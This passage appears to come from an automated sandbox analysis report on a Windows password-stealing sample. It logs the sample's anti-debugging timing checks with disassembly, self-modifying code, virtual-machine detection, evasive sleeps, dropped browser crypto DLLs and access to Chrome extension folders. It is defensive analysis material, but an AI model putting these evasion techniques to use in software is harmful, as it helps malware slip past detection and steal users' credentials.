Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4BB0453 second address: 4BB0471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F69D1080A53h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4BB0471 second address: 4BB04B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F69D121AB2Fh 0x00000008 movzx esi, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F69D121AB2Bh 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F69D121AB35h 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4BB04B0 second address: 4BB04C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D1080A4Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4BB04C0 second address: 4BB04C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4BB02ED second address: 4BB031F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F69D1080A4Fh 0x00000009 sbb ch, FFFFFFBEh 0x0000000c jmp 00007F69D1080A59h 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B50178 second address: 4B501B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov si, 927Bh 0x0000000f jmp 00007F69D121AB30h 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 movsx edi, si 0x0000001a mov edi, esi 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f mov ecx, edx 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 pushad 0x00000025 mov cl, bh 0x00000027 push eax 0x00000028 push edx 0x00000029 mov si, 7627h 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B501B6 second address: 4B501E0 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F69D1080A4Ch 0x00000008 and ax, 0D58h 0x0000000d jmp 00007F69D1080A4Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B501E0 second address: 4B501E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B501E4 second address: 4B501EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4BB0689 second address: 4BB068D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4BB068D second address: 4BB0693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4BB0693 second address: 4BB06B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D121AB39h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4BB06B0 second address: 4BB06B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4BB06B4 second address: 4BB06C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4BB06C3 second address: 4BB06D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Special instruction interceptor: First address: 51E971 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Special instruction interceptor: First address: 51E87C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Special instruction interceptor: First address: 6B9F16 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Special instruction interceptor: First address: 6BA348 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Special instruction interceptor: First address: 6B8B8E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Special instruction interceptor: First address: 7428A8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 82E971 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 82E87C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 9C9F16 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 9CA348 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 9C8B8E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: A528A8 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Code function: 5_2_04BB0681 rdtsc 5_2_04BB0681
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 7970 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 2029 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: foregroundWindowGot 437 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1149 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1227 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 410 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1206 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1166 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 1182 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Window / User API: threadDelayed 848 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe API coverage: 0.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe TID: 7356 Thread sleep count: 314 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8084 Thread sleep time: -60030s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8064 Thread sleep count: 1149 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8064 Thread sleep time: -2299149s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8056 Thread sleep count: 1227 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8056 Thread sleep time: -2455227s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8044 Thread sleep count: 410 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8044 Thread sleep time: -12300000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 5672 Thread sleep time: -540000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8072 Thread sleep count: 1206 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8072 Thread sleep time: -2413206s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8068 Thread sleep count: 1166 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8068 Thread sleep time: -2333166s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8076 Thread sleep count: 1182 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 8076 Thread sleep time: -2365182s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe TID: 7428 Thread sleep count: 848 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Code function: 0_2_6C4DC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C4DC930
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: vmci.sys
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: vmware
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.4.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: BGIIDAEBGC.exe, BGIIDAEBGC.exe, 00000005.00000002.1905859514.0000000000698000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, explorti.exe, 00000008.00000002.4133646158.00000000009A8000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000C.00000002.2140291996.00000000009A8000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000E.00000002.2741569840.00000000009A8000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000F.00000002.3340026597.00000000009A8000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 00000010.00000002.3940679044.00000000009A8000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual USB Mouse
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: Amcache.hve.4.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
